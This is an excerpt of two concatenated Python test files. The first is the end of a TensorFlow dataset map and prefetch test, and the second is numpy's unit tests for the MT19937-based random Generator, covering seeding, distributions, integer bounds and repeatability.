sess.run(get_next)
def testPrefetch(self):
# We will use this event to test that `_map_py_func()` has been
# invoked a certain number of times (6 times, to be exact) after
# consuming fewer elements from the iterator.
ev = threading.Event()
set_event_during_invocation = 5
def _map_py_func(x):
if x == set_event_during_invocation:
ev.set()
return x * x
def _map_fn(x):
return script_ops.py_func(_map_py_func, [x], x.dtype)
buffer_size_placeholder = array_ops.placeholder(dtypes.int64, shape=[])
iterator = (
dataset_ops.Dataset.range(100)
.map(_map_fn)
.prefetch(buffer_size_placeholder)
.make_initializable_iterator())
init_op = iterator.initializer
get_next = iterator.get_next()
with self.test_session() as sess:
# Simple test that prefetch yields the expected values in the
# expected order.
for buffer_size in [1, 10, 100, 1000]:
sess.run(init_op, feed_dict={buffer_size_placeholder: buffer_size})
for i in range(100):
self.assertEqual(i * i, sess.run(get_next))
with self.assertRaises(errors.OutOfRangeError):
sess.run(get_next)
# We can indirectly observe that varying the buffer size has the
# intended effect by observing when `ev` is set (on the 6th
# invocation of `_map_py_func()`).
# NOTE(mrry): We do not test with `buffer_size ==
# set_event_during_invocation`, because we must consume at least
# one element to start the prefetching.
for buffer_size in range(1, set_event_during_invocation):
event_will_be_set_after_consuming = (
set_event_during_invocation - buffer_size + 1)
ev.clear()
sess.run(init_op, feed_dict={buffer_size_placeholder: buffer_size})
for i in range(event_will_be_set_after_consuming):
self.assertFalse(ev.is_set())
self.assertEqual(i * i, sess.run(get_next))
ev.wait()
for i in range(event_will_be_set_after_consuming, 100):
self.assertEqual(i * i, sess.run(get_next))
with self.assertRaises(errors.OutOfRangeError):
sess.run(get_next)
def testReturnList(self):
iterator = (dataset_ops.Dataset.range(10)
.map(lambda x: [x, constant_op.constant(37.0)])
.make_initializable_iterator())
init_op = iterator.initializer
get_next = iterator.get_next()
with self.test_session() as sess:
sess.run(init_op)
for i in range(10):
self.assertEqual((i, 37.0), sess.run(get_next))
with self.assertRaises(errors.OutOfRangeError):
sess.run(get_next)
def testMultiOutputPyFunc(self):
# The `tf.py_func()` op returns a list of tensors for its outputs.
def _map_fn(x_tensor):
def _map_py_func(x):
return x, np.array(37.0, dtype=np.float64)
return script_ops.py_func(
_map_py_func, [x_tensor], [dtypes.int64, dtypes.float64])
iterator = (dataset_ops.Dataset.range(10)
.map(_map_fn)
.make_initializable_iterator())
init_op = iterator.initializer
get_next = iterator.get_next()
with self.test_session() as sess:
sess.run(init_op)
for i in range(10):
self.assertEqual((i, 37.0), sess.run(get_next))
with self.assertRaises(errors.OutOfRangeError):
sess.run(get_next)
if __name__ == "__main__":
test.main()
|
test_generator_mt19937.py
|
import sys
import hashlib
import pytest
import numpy as np
from numpy.linalg import LinAlgError
from numpy.testing import (
assert_, assert_raises, assert_equal, assert_allclose,
assert_warns, assert_no_warnings, assert_array_equal,
assert_array_almost_equal, suppress_warnings)
from numpy.random import Generator, MT19937, SeedSequence
random = Generator(MT19937())
JUMP_TEST_DATA = [
{
"seed": 0,
"steps": 10,
"initial": {"key_md5": "64eaf265d2203179fb5ffb73380cd589", "pos": 9},
"jumped": {"key_md5": "8cb7b061136efceef5217a9ce2cc9a5a", "pos": 598},
},
{
"seed":384908324,
"steps":312,
"initial": {"key_md5": "e99708a47b82ff51a2c7b0625b81afb5", "pos": 311},
"jumped": {"key_md5": "2ecdbfc47a895b253e6e19ccb2e74b90", "pos": 276},
},
{
"seed": [839438204, 980239840, 859048019, 821],
"steps": 511,
"initial": {"key_md5": "9fcd6280df9199785e17e93162ce283c", "pos": 510},
"jumped": {"key_md5": "433b85229f2ed853cde06cd872818305", "pos": 475},
},
]
@pytest.fixture(scope='module', params=[True, False])
def endpoint(request):
return request.param
class TestSeed:
def test_scalar(self):
s = Generator(MT19937(0))
assert_equal(s.integers(1000), 479)
s = Generator(MT19937(4294967295))
assert_equal(s.integers(1000), 324)
def test_array(self):
s = Generator(MT19937(range(10)))
assert_equal(s.integers(1000), 465)
s = Generator(MT19937(np.arange(10)))
assert_equal(s.integers(1000), 465)
s = Generator(MT19937([0]))
assert_equal(s.integers(1000), 479)
s = Generator(MT19937([4294967295]))
assert_equal(s.integers(1000), 324)
def test_seedsequence(self):
s = MT19937(SeedSequence(0))
assert_equal(s.random_raw(1), 2058676884)
def test_invalid_scalar(self):
# seed must be an unsigned 32 bit integer
assert_raises(TypeError, MT19937, -0.5)
assert_raises(ValueError, MT19937, -1)
def test_invalid_array(self):
# seed must be an unsigned integer
assert_raises(TypeError, MT19937, [-0.5])
assert_raises(ValueError, MT19937, [-1])
assert_raises(ValueError, MT19937, [1, -2, 4294967296])
def test_noninstantized_bitgen(self):
assert_raises(ValueError, Generator, MT19937)
class TestBinomial:
def test_n_zero(self):
# Tests the corner case of n == 0 for the binomial distribution.
# binomial(0, p) should be zero for any p in [0, 1].
# This test addresses issue #3480.
zeros = np.zeros(2, dtype='int')
for p in [0, .5, 1]:
assert_(random.binomial(0, p) == 0)
assert_array_equal(random.binomial(zeros, p), zeros)
def test_p_is_nan(self):
# Issue #4571.
assert_raises(ValueError, random.binomial, 1, np.nan)
class TestMultinomial:
def test_basic(self):
random.multinomial(100, [0.2, 0.8])
def test_zero_probability(self):
random.multinomial(100, [0.2, 0.8, 0.0, 0.0, 0.0])
def test_int_negative_interval(self):
assert_(-5 <= random.integers(-5, -1) < -1)
x = random.integers(-5, -1, 5)
assert_(np.all(-5 <= x))
assert_(np.all(x < -1))
def test_size(self):
# gh-3173
p = [0.5, 0.5]
assert_equal(random.multinomial(1, p, np.uint32(1)).shape, (1, 2))
assert_equal(random.multinomial(1, p, np.uint32(1)).shape, (1, 2))
assert_equal(random.multinomial(1, p, np.uint32(1)).shape, (1, 2))
assert_equal(random.multinomial(1, p, [2, 2]).shape, (2, 2, 2))
assert_equal(random.multinomial(1, p, (2, 2)).shape, (2, 2, 2))
assert_equal(random.multinomial(1, p, np.array((2, 2))).shape,
(2, 2, 2))
assert_raises(TypeError, random.multinomial, 1, p,
float(1))
def test_invalid_prob(self):
assert_raises(ValueError, random.multinomial, 100, [1.1, 0.2])
assert_raises(ValueError, random.multinomial, 100, [-.1, 0.9])
def test_invalid_n(self):
assert_raises(ValueError, random.multinomial, -1, [0.8, 0.2])
assert_raises(ValueError, random.multinomial, [-1] * 10, [0.8, 0.2])
def test_p_non_contiguous(self):
p = np.arange(15.)
p /= np.sum(p[1::3])
pvals = p[1::3]
random = Generator(MT19937(1432985819))
non_contig = random.multinomial(100, pvals=pvals)
random = Generator(MT19937(1432985819))
contig = random.multinomial(100, pvals=np.ascontiguousarray(pvals))
assert_array_equal(non_contig, contig)
def test_multidimensional_pvals(self):
assert_raises(ValueError, random.multinomial, 10, [[0, 1]])
assert_raises(ValueError, random.multinomial, 10, [[0], [1]])
assert_raises(ValueError, random.multinomial, 10, [[[0], [1]], [[1], [0]]])
assert_raises(ValueError, random.multinomial, 10, np.array([[0, 1], [1, 0]]))
class TestMultivariateHypergeometric:
def setup(self):
self.seed = 8675309
def test_argument_validation(self):
# Error cases...
# `colors` must be a 1-d sequence
assert_raises(ValueError, random.multivariate_hypergeometric,
10, 4)
# Negative nsample
assert_raises(ValueError, random.multivariate_hypergeometric,
[2, 3, 4], -1)
# Negative color
assert_raises(ValueError, random.multivariate_hypergeometric,
[-1, 2, 3], 2)
# nsample exceeds sum(colors)
assert_raises(ValueError, random.multivariate_hypergeometric,
[2, 3, 4], 10)
# nsample exceeds sum(colors) (edge case of empty colors)
assert_raises(ValueError, random.multivariate_hypergeometric,
[], 1)
# Validation errors associated with very large values in colors.
assert_raises(ValueError, random.multivariate_hypergeometric,
[999999999, 101], 5, 1, 'marginals')
int64_info = np.iinfo(np.int64)
max_int64 = int64_info.max
max_int64_index = max_int64 // int64_info.dtype.itemsize
assert_raises(ValueError, random.multivariate_hypergeometric,
[max_int64_index - 100, 101], 5, 1, 'count')
@pytest.mark.parametrize('method', ['count', 'marginals'])
def test_edge_cases(self, method):
# Set the seed, but in fact, all the results in this test are
# deterministic, so we don't really need this.
random = Generator(MT19937(self.seed))
x = random.multivariate_hypergeometric([0, 0, 0], 0, method=method)
assert_array_equal(x, [0, 0, 0])
x = random.multivariate_hypergeometric([], 0, method=method)
assert_array_equal(x, [])
x = random.multivariate_hypergeometric([], 0, size=1, method=method)
assert_array_equal(x, np.empty((1, 0), dtype=np.int64))
x = random.multivariate_hypergeometric([1, 2, 3], 0, method=method)
assert_array_equal(x, [0, 0, 0])
x = random.multivariate_hypergeometric([9, 0, 0], 3, method=method)
assert_array_equal(x, [3, 0, 0])
colors = [1, 1, 0, 1, 1]
x = random.multivariate_hypergeometric(colors, sum(colors),
method=method)
assert_array_equal(x, colors)
x = random.multivariate_hypergeometric([3, 4, 5], 12, size=3,
method=method)
assert_array_equal(x, [[3, 4, 5]]*3)
# Cases for nsample:
# nsample < 10
# 10 <= nsample < colors.sum()/2
# colors.sum()/2 < nsample < colors.sum() - 10
# colors.sum() - 10 < nsample < colors.sum()
@pytest.mark.parametrize('nsample', [8, 25, 45, 55])
@pytest.mark.parametrize('method', ['count', 'marginals'])
@pytest.mark.parametrize('size', [5, (2, 3), 150000])
def test_typical_cases(self, nsample, method, size):
random = Generator(MT19937(self.seed))
colors = np.array([10, 5, 20, 25])
sample = random.multivariate_hypergeometric(colors, nsample, size,
method=method)
if isinstance(size, int):
expected_shape = (size,) + colors.shape
else:
expected_shape = size + colors.shape
assert_equal(sample.shape, expected_shape)
assert_((sample >= 0).all())
assert_((sample <= colors).all())
assert_array_equal(sample.sum(axis=-1),
np.full(size, fill_value=nsample, dtype=int))
if isinstance(size, int) and size >= 100000:
# This sample is large enough to compare its mean to
# the expected values.
assert_allclose(sample.mean(axis=0),
nsample * colors / colors.sum(),
rtol=1e-3, atol=0.005)
def test_repeatability1(self):
random = Generator(MT19937(self.seed))
sample = random.multivariate_hypergeometric([3, 4, 5], 5, size=5,
method='count')
expected = np.array([[2, 1, 2],
[2, 1, 2],
[1, 1, 3],
[2, 0, 3],
[2, 1, 2]])
assert_array_equal(sample, expected)
def test_repeatability2(self):
random = Generator(MT19937(self.seed))
sample = random.multivariate_hypergeometric([20, 30, 50], 50,
size=5,
method='marginals')
expected = np.array([[ 9, 17, 24],
[ 7, 13, 30],
[ 9, 15, 26],
[ 9, 17, 24],
[12, 14, 24]])
assert_array_equal(sample, expected)
def test_repeatability3(self):
random = Generator(MT19937(self.seed))
sample = random.multivariate_hypergeometric([20, 30, 50], 12,
size=5,
method='marginals')
expected = np.array([[2, 3, 7],
[5, 3, 4],
[2, 5, 5],
[5, 3, 4],
[1, 5, 6]])
assert_array_equal(sample, expected)
class TestSetState:
def setup(self):
self.seed = 1234567890
self.rg = Generator(MT19937(self.seed))
self.bit_generator = self.rg.bit_generator
self.state = self.bit_generator.state
self.legacy_state = (self.state['bit_generator'],
self.state['state']['key'],
self.state['state']['pos'])
def test_gaussian_reset(self):
# Make sure the cached every-other-Gaussian is reset.
old = self.rg.standard_normal(size=3)
self.bit_generator.state = self.state
new = self.rg.standard_normal(size=3)
assert_(np.all(old == new))
def test_gaussian_reset_in_media_res(self):
# When the state is saved with a cached Gaussian, make sure the
# cached Gaussian is restored.
self.rg.standard_normal()
state = self.bit_generator.state
old = self.rg.standard_normal(size=3)
self.bit_generator.state = state
new = self.rg.standard_normal(size=3)
assert_(np.all(old == new))
def test_negative_binomial(self):
# Ensure that the negative binomial results take floating point
# arguments without truncation.
self.rg.negative_binomial(0.5, 0.5)
class TestIntegers:
rfunc = random.integers
# valid integer/boolean types
itype = [bool, np.int8, np.uint8, np.int16, np.uint16,
np.int32, np.uint32, np.int64, np.uint64]
def test_unsupported_type(self, endpoint):
assert_raises(TypeError, self.rfunc, 1, endpoint=endpoint, dtype=float)
def test_bounds_checking(self, endpoint):
for dt in self.itype:
lbnd = 0 if dt is bool else np.iinfo(dt).min
ubnd = 2 if dt is bool else np.iinfo(dt).max + 1
ubnd = ubnd - 1 if endpoint else ubnd
assert_raises(ValueError, self.rfunc, lbnd - 1, ubnd,
endpoint=endpoint, dtype=dt)
assert_raises(ValueError, self.rfunc, lbnd, ubnd + 1,
endpoint=endpoint, dtype=dt)
assert_raises(ValueError, self.rfunc, ubnd, lbnd,
endpoint=endpoint, dtype=dt)
assert_raises(ValueError, self.rfunc, 1, 0, endpoint=endpoint,
dtype=dt)
assert_raises(ValueError, self.rfunc, [lbnd - 1], ubnd,
endpoint=endpoint, dtype=dt)
assert_raises(ValueError, self.rfunc, [lbnd], [ubnd + 1],
endpoint=endpoint, dtype=dt)
assert_raises(ValueError, self.rfunc, [ubnd], [lbnd],
endpoint=endpoint, dtype=dt)
assert_raises(ValueError, self.rfunc, 1, [0],
endpoint=endpoint, dtype=dt)
def test_bounds_checking_array(self, endpoint):
for dt in self.itype:
lbnd = 0 if dt is bool else np.iinfo(dt).min
ubnd = 2 if dt is bool else np.iinfo(dt).max + (not endpoint)
assert_raises(ValueError, self.rfunc, [lbnd - 1] * 2, [ubnd] * 2,
endpoint=endpoint, dtype=dt)
assert_raises(ValueError, self.rfunc, [lbnd] * 2,
[ubnd + 1] * 2, endpoint=endpoint, dtype=dt)
assert_raises(ValueError, self.rfunc, ubnd, [lbnd] * 2,
endpoint=endpoint, dtype=dt)
assert_raises(ValueError, self.rfunc, [1] * 2, 0,
endpoint=endpoint, dtype=dt)
def test_rng_zero_and_extremes(self, endpoint):
for dt in self.itype:
lbnd = 0 if dt is bool else np.iinfo(dt).min
ubnd = 2 if dt is bool else np.iinfo(dt).max + 1
ubnd = ubnd - 1 if endpoint else ubnd
is_open = not endpoint
tgt = ubnd - 1
assert_equal(self.rfunc(tgt, tgt + is_open, size=1000,
endpoint=endpoint, dtype=dt), tgt)
assert_equal(self.rfunc([tgt], tgt + is_open, size=1000,
endpoint=endpoint, dtype=dt), tgt)
tgt = lbnd
assert_equal(self.rfunc(tgt, tgt + is_open, size=1000,
endpoint=endpoint, dtype=dt), tgt)
assert_equal(self.rfunc(tgt, [tgt + is_open], size=1000,
endpoint=endpoint, dtype=dt), tgt)
tgt = (lbnd + ubnd) // 2
assert_equal(self.rfunc(tgt, tgt + is_open, size=1000,
endpoint=endpoint, dtype=dt), tgt)
assert_equal(self.rfunc([tgt], [tgt + is_open],
size=1000, endpoint=endpoint, dtype=dt),
tgt)
def test_rng_zero_and_extremes_array(self, endpoint):
size = 1000
for dt in self.itype:
lbnd = 0 if dt is bool else np.iinfo(dt).min
ubnd = 2 if dt is bool else np.iinfo(dt).max + 1
ubnd = ubnd - 1 if endpoint else ubnd
tgt = ubnd - 1
assert_equal(self.rfunc([tgt], [tgt + 1],
size=size, dtype=dt), tgt)
assert_equal(self.rfunc(
[tgt] * size, [tgt + 1] * size, dtype=dt), tgt)
assert_equal(self.rfunc(
[tgt] * size, [tgt + 1] * size, size=size, dtype=dt), tgt)
tgt = lbnd
assert_equal(self.rfunc([tgt], [tgt + 1],
size=size, dtype=dt), tgt)
assert_equal(self.rfunc(
[tgt] * size, [tgt + 1] * size, dtype=dt), tgt)
assert_equal(self.rfunc(
[tgt] * size, [tgt + 1] * size, size=size, dtype=dt), tgt)
tgt = (lbnd + ubnd) // 2
assert_equal(self.rfunc([tgt], [tgt + 1],
size=size, dtype=dt), tgt)
assert_equal(self.rfunc(
[tgt] * size, [tgt + 1] * size, dtype=dt), tgt)
assert_equal(self.rfunc(
[tgt] * size, [tgt + 1] * size, size=size, dtype=dt), tgt)
def test_full_range(self, endpoint):
# Test for ticket #1690
for dt in self.itype:
lbnd = 0 if dt is bool else np.iinfo(dt).min
ubnd = 2 if dt is bool else np.iinfo(dt).max + 1
ubnd = ubnd - 1 if endpoint else ubnd
try:
self.rfunc(lbnd, ubnd, endpoint=endpoint, dtype=dt)
except Exception as e:
raise AssertionError("No error should have been raised, "
"but one was with the following "
"message:\n\n%s" % str(e))
def test_full_range_array(self, endpoint):
# Test for ticket #1690
for dt in self.itype:
lbnd = 0 if dt is bool else np.iinfo(dt).min
ubnd = 2 if dt is bool else np.iinfo(dt).max + 1
ubnd = ubnd - 1 if endpoint else ubnd
try:
self.rfunc([lbnd] * 2, [ubnd], endpoint=endpoint, dtype=dt)
except Exception as e:
raise AssertionError("No error should have been raised, "
"but one was with the following "
"message:\n\n%s" % str(e))
def test_in_bounds_fuzz(self, endpoint):
# Don't use fixed seed
random = Generator(MT19937())
for dt in self.itype[1:]:
for ubnd in [4, 8, 16]:
vals = self.rfunc(2, ubnd - endpoint, size=2 ** 16,
endpoint=endpoint, dtype=dt)
assert_(vals.max() < ubnd)
assert_(vals.min() >= 2)
vals = self.rfunc(0, 2 - endpoint, size=2 ** 16, endpoint=endpoint,
dtype=bool)
assert_(vals.max() < 2)
assert_(vals.min() >= 0)
def test_scalar_array_equiv(self, endpoint):
for dt in self.itype:
lbnd = 0 if dt is bool else np.iinfo(dt).min
ubnd = 2 if dt is bool else np.iinfo(dt).max + 1
ubnd = ubnd - 1 if endpoint else ubnd
size = 1000
random = Generator(MT19937(1234))
scalar = random.integers(lbnd, ubnd, size=size, endpoint=endpoint,
dtype=dt)
random = Generator(MT19937(1234))
scalar_array = random.integers([lbnd], [ubnd], size=size,
endpoint=endpoint, dtype=dt)
random = Generator(MT19937(1234))
array = random.integers([lbnd] * size, [ubnd] *
size, size=size, endpoint=endpoint, dtype=dt)
assert_array_equal(scalar, scalar_array)
assert_array_equal(scalar, array)
def test_repeatability(self, endpoint):
# We use a md5 hash of generated sequences of 1000 samples
# in the range [0, 6) for all but bool, where the range
# is [0, 2). Hashes are for little endian numbers.
tgt = {'bool': 'b3300e66d2bb59e493d255d47c3a6cbe',
'int16': '39624ead49ad67e37545744024d2648b',
'int32': '5c4810373f979336c6c0c999996e47a1',
'int64': 'ab126c15edff26f55c50d2b7e37391ac',
'int8': 'ba71ccaffeeeb9eeb1860f8075020b9c',
'uint16': '39624ead49ad67e37545744024d2648b',
'uint32': '5c4810373f979336c6c0c999996e47a1',
'uint64': 'ab126c15edff26f55c50d2b7e37391ac',
'uint8': 'ba71ccaffeeeb9eeb1860f8075020b9c'}
for dt in self.itype[1:]:
random = Generator(MT19937(1234))
# view as little endian for hash
if sys.byteorder == 'little':
val = random.integers(0, 6 - endpoint, size=1000, endpoint=endpoint,
dtype=dt)
else:
val = random.integers(0, 6 - endpoint, size=1000, endpoint=endpoint,
dtype=dt).byteswap()
res = hashlib.md5(val).hexdigest()
assert_(tgt[np.dtype(dt).name] == res)
# bools do not depend on endianness
random = Generator(MT19937(1234))
val = random.integers(0, 2 - endpoint, size=1000, endpoint=endpoint,
dtype=bool).view(np.int8)
res = hashlib.md5(val).hexdigest()
assert_(tgt[np.dtype(bool).name] == res)
def test_repeatability_broadcasting(self, endpoint):
for dt in self.itype:
lbnd = 0 if dt in (bool, np.bool_) else np.iinfo(dt).min
ubnd = 2 if dt in (bool, np.bool_) else np.iinfo(dt).max + 1
ubnd = ubnd - 1 if endpoint else ubnd
# view as little endian for hash
random = Generator(MT19937(1234))
val = random.integers(lbnd, ubnd, size=1000, endpoint=endpoint,
dtype=dt)
random = Generator(MT19937(1234))
val_bc = random.integers([lbnd] * 1000, ubnd, endpoint=endpoint,
dtype=dt)
assert_array_equal(val, val_bc)
random = Generator(MT19937(1234))
val_bc = random.integers([lbnd] * 1000, [ubnd] * 1000,
endpoint=endpoint, dtype=dt)
assert_array_equal(val, val_bc)
@pytest.mark.parametrize(
'bound, expected',
[(2**32 - 1, np.array([517043486, 1364798665, 1733884389, 1353720612,
3769704066, 1170797179, 4108474671])),
(2**32, np.array([517043487, 1364798666, 1733884390, 1353720613,
3769704067, 1170797180, 4108474672])),
(2**32 + 1, np.array([517043487, 1733884390, 3769704068, 4108474673,
1831631863, 1215661561, 3869512430]))]
)
def test_repeatability_32bit_boundary(self, bound, expected):
for size in [None, len(expected)]:
random = Generator(MT19937(1234))
x = random.integers(bound, size=size)
assert_equal(x, expected if size is not None else expected[0])
def test_repeatability_32bit_boundary_broadcasting(self):
desired = np.array([[[1622936284, 3620788691, 1659384060],
[1417365545, 760222891, 1909653332],
[3788118662, 660249498, 4092002593]],
[[3625610153, 2979601262, 3844162757],
[ 685800658, 120261497, 2694012896],
[1207779440, 1586594375, 3854335050]],
[[3004074748, 2310761796, 3012642217],
[2067714190, 2786677879, 1363865881],
[ 791663441, 1867303284, 2169727960]],
[[1939603804, 1250951100, 298950036],
[1040128489, 3791912209, 3317053765],
[3155528714, 61360675, 2305155588]],
[[ 817688762, 1335621943, 3288952434],
[1770890872, 1102951817, 1957607470],
[3099996017, 798043451, 48334215]]])
for size in [None, (5, 3, 3)]:
random = Generator(MT19937(12345))
x = random.integers([[-1], [0], [1]],
[2**32 - 1, 2**32, 2**32 + 1],
size=size)
assert_array_equal(x, desired if size is not None else desired[0])
def test_int64_uint64_broadcast_exceptions(self, endpoint):
configs = {np.uint64: ((0, 2**65), (-1, 2**62), (10, 9), (0, 0)),
np.int64: ((0, 2**64), (-(2**64), 2**62), (10, 9), (0, 0),
(-2**63-1, -2**63-1))}
for dtype in configs:
for config in configs[dtype]:
low, high = config
high = high - endpoint
low_a = np.array([[low]*10])
high_a = np.array([high] * 10)
assert_raises(ValueError, random.integers, low, high,
endpoint=endpoint, dtype=dtype)
assert_raises(ValueError, random.integers, low_a, high,
endpoint=endpoint, dtype=dtype)
assert_raises(ValueError, random.integers, low, high_a,
endpoint=endpoint, dtype=dtype)
assert_raises(ValueError, random.integers, low_a, high_a,
endpoint=endpoint, dtype=dtype)
low_o = np.array([[low]*10], dtype=object)
high_o = np.array([high] * 10, dtype=object)
assert_raises(ValueError, random.integers, low_o, high,
endpoint=endpoint, dtype=dtype)
assert_raises(ValueError, random.integers, low, high_o,
endpoint=endpoint, dtype=dtype)
assert_raises(ValueError, random.integers, low_o, high_o,
endpoint=endpoint, dtype=dtype)
def test_int64_uint64_corner_case(self, endpoint):
# When stored in Numpy arrays, `lbnd` is casted
# as np.int64, and `ubnd` is casted as np.uint64.
# Checking whether `lbnd` >= `ubnd` used to be
# done solely via direct comparison, which is incorrect
# because when Numpy tries to compare both numbers,
# it casts both to np.float64 because there is
# no integer superset of np.int64 and np.uint64. However,
# `ubnd` is too large to be represented in np.float64,
# causing it be round down to np.iinfo(np.int64).max,
# leading to a ValueError because `lbnd` now equals
# the new `ubnd`.
dt = np.int64
tgt = np.iinfo(np.int64).max
lbnd = np.int64(np.iinfo(np.int64).max)
ubnd = np.uint64(np.iinfo(np.int64).max + 1 - endpoint)
# None of these function calls should
# generate a ValueError now.
actual = random.integers(lbnd, ubnd, endpoint=endpoint, dtype=dt)
assert_equal(actual, tgt)
def test_respect_dtype_singleton(self, endpoint):
# See gh-7203
for dt in self.itype:
lbnd = 0 if dt is bool else np.iinfo(dt).min
ubnd = 2 if dt is bool else np.iinfo(dt).max + 1
ubnd = ubnd - 1 if endpoint else ubnd
dt = np.bool_ if dt is bool else dt
sample = self.rfunc(lbnd, ubnd, endpoint=endpoint, dtype=dt)
assert_equal(sample.dtype, dt)
for dt in (bool, int, np.compat.long):
lbnd = 0 if dt is bool else np.iinfo(dt).min
ubnd = 2 if dt is bool else np.iinfo(dt).max + 1
ubnd = ubnd - 1 if endpoint else ubnd
# gh-7284: Ensure that we get Python data types
sample = self.rfunc(lbnd, ubnd, endpoint=endpoint, dtype=dt)
assert not hasattr(sample, 'dtype')
assert_equal(type(sample), dt)
def test_respect_dtype_array(self, endpoint):
# See gh-7203
for dt in self.itype:
lbnd = 0 if dt is bool else np.iinfo(dt).min
ubnd = 2 if dt is bool else np.iinfo(dt).max + 1
ubnd = ubnd - 1 if endpoint else ubnd
dt = np.bool_ if dt is bool else dt
sample = self.rfunc([lbnd], [ubnd], endpoint=endpoint, dtype=dt)
assert_equal(sample.dtype, dt)
sample = self.rfunc([lbnd] * 2, [ubnd] * 2, endpoint=endpoint,
dtype=dt)
assert_equal(sample.dtype, dt)
def test_zero_size(self, endpoint):
# See gh-7203
for dt in self.itype:
sample = self.rfunc(0, 0, (3, 0, 4), endpoint=endpoint, dtype=dt)
assert sample.shape == (3, 0, 4)
assert sample.dtype == dt
assert self.rfunc(0, -10, 0, endpoint=endpoint,
dtype=dt).shape == (0,)
assert_equal(random.integers(0, 0, size=(3, 0, 4)).shape,
(3, 0, 4))
assert_equal(random.integers(0, -10, size=0).shape, (0,))
assert_equal(random.integers(10, 10, size=0).shape, (0,))
def test_error_byteorder(self):
other_byteord_dt = '<i4' if sys.byteorder == 'big' else '>i4'
with pytest.raises(ValueError):
random.integers(0, 200, size=10, dtype=other_byteord_dt)
# chi2max is the maximum acceptable chi-squared value.
@pytest.mark.slow
@pytest.mark.parametrize('sample_size,high,dtype,chi2max',
[(5000000, 5, np.int8, 125.0), # p-value ~4.6e-25
(5000000, 7, np.uint8, 150.0), # p-value ~7.7e-30
(10000000, 2500, np.int16, 3300.0), # p-value ~3.0e-25
(50000000, 5000, np.uint16, 6500.0), # p-value ~3.5e-25
])
def test_integers_small_dtype_chisquared(self, sample_size, high,
dtype, chi2max):
# Regression test for gh-14774.
samples = random.integers(high, size=sample_size, dtype=dtype)
values, counts = np.unique(samples, return_counts=True)
expected = sample_size / high
chi2 = ((counts - expected)**2 / expected).sum()
assert chi2 < chi2max
class TestRandomDist:
# Make sure the random distribution returns the correct value for a
# given seed
def setup(self):
self.seed = 1234567890
def test_integers(self):
random = Generator(MT19937(self.seed))
actual = random.integers(-99, 99, size=(3, 2))
desired = np.array([[-80, -56], [41, 37], [-83, -16]])
assert_array_equal(actual, desired)
def test_integers_masked(self):
# Test masked rejection sampling algorithm to generate array of
# uint32 in an interval.
random = Generator(MT19937(self.seed))
actual = random.integers(0, 99, size=(3, 2), dtype=np.uint32)
desired = np.array([[9, 21], [70, 68], [8, 41]], dtype=np.uint32)
assert_array_equal(actual, desired)
def test_integers_closed(self):
random = Generator(MT19937(self.seed))
actual = random.integers(-99, 99, size=(3, 2), endpoint=True)
desired = np.array([[-80, -56], [ 41, 38], [-83, -15]])
assert_array_equal(actual, desired)
def test_integers_max_int(self):
# Tests whether integers with closed=True can generate the
# maximum allowed Python int that can be converted
# into a C long. Previous implementations of this
# method have thrown an OverflowError when attempting
# to generate this integer.
actual = random.integers(np.iinfo('l').max, np.iinfo('l').max,
endpoint=True)
desired = np.iinfo('l').max
assert_equal(actual, desired)
def test_random(self):
random = Generator(MT19937(self.seed))
actual = random.random((3, 2))
desired = np.array([[0.096999199829214, 0.707517457682192],
[0.084364834598269, 0.767731206553125],
[0.665069021359413, 0.715487190596693]])
assert_array_almost_equal(actual, desired, decimal=15)
random = Generator(MT19937(self.seed))
actual = random.random()
assert_array_almost_equal(actual, desired[0, 0], decimal=15)
def test_random_float(self):
random = Generator(MT19937(self.seed))
actual = random.random((3, 2))
desired = np.array([[0.0969992 , 0.70751746],
[0.08436483, 0.76773121],
[0.66506902, 0.71548719]])
assert_array_almost_equal(actual, desired, decimal=7)
def test_random_float_scalar(self):
random = Generator(MT19937(self.seed))
actual = random.random(dtype=np.float32)
desired = 0.0969992
assert_array_almost_equal(actual, desired, decimal=7)
def test_random_unsupported_type(self):
assert_raises(TypeError, random.random, dtype='int32')
def test_choice_uniform_replace(self):
random = Generator(MT19937(self.seed))
actual = random.choice(4, 4)
desired = np.array([0, 0, 2, 2], dtype=np.int64)
assert_array_equal(actual, desired)
def test_choice_nonuniform_replace(self):
random = Generator(MT19937(self.seed))
actual = random.choice(4, 4, p=[0.4, 0.4, 0.1, 0.1])
desired = np.array([0, 1, 0, 1], dtype=np.int64)
assert_array_equal(actual, desired)
def test_choice_uniform_noreplace(self):
random = Generator(MT19937(self.seed))
actual = random.choice(4, 3, replace=False)
desired = np.array([2, 0, 3], dtype=np.int64)
assert_array_equal(actual, desired)
actual = random.choice(4, 4, replace=False, shuffle=False)
desired = np.arange(4, dtype=np.int64)
assert_array_equal(actual, desired)
def test_choice_nonuniform_noreplace(self):
random = Generator(MT19937(self.seed))
actual = random.choice(4, 3, replace=False, p=[0.1, 0.3, 0.5, 0.1])
desired = np.array([0, 2, 3], dtype=np.int64)
assert_array_equal(actual, desired)
def test_choice_noninteger(self):
random = Generator(MT19937(self.seed))
actual = random.choice(['a', 'b', 'c', 'd'], 4)
desired = np.array(['a', 'a', 'c', 'c'])
assert_array_equal(actual, desired)
def test_choice_multidimensional_default_axis(self):
random = Generator(MT19937(self.seed))
actual = random.choice([[0, 1], [2, 3], [4, 5], [6, 7]], 3)
desired = np.array([[0, 1], [0, 1], [4, 5]])
assert_array_equal(actual, desired)
def test_choice_multidimensional_custom_axis(self):
random = Generator(MT19937(self.seed))
actual = random.choice([[0, 1], [2, 3], [4, 5], [6, 7]], 1, axis=1)
desired = np.array([[0], [2], [4], [6]])
assert_array_equal(actual, desired)
def test_choice_exceptions(self):
sample = random.choice
assert_raises(ValueError, sample, -1, 3)
assert_raises(ValueError, sample, 3., 3)
assert_raises(ValueError, sample, [], 3)
assert_raises(ValueError, sample, [1, 2, 3, 4], 3,
p=[[0.25, 0.25], [0.25, 0.25]])
assert_raises(ValueError, sample, [1, 2], 3, p=[0.4, 0.4, 0.2])
assert_raises(ValueError, sample, [1, 2], 3, p=[1.1, -0.1])
assert_raises(ValueError, sample, [1, 2], 3, p=[0.4, 0.4])
assert_raises(ValueError, sample, [1, 2, 3], 4, replace=False)
# gh-13087
assert_raises(ValueError, sample, [1, 2, 3], -2, replace=False)
assert_raises(ValueError, sample, [1, 2, 3], (-1,), replace=False)
assert_raises(ValueError, sample, [1, 2, 3], (-1, 1), replace=False)
assert_raises(ValueError, sample, [1, 2, 3], 2,
replace=False, p=[1, 0, 0])
def test_choice_return_shape(self):
p = [0.1, 0.9]
# Check scalar
assert_(np.isscalar(random.choice(2, replace=True)))
assert_(np.isscalar(random.choice(2, replace=False)))
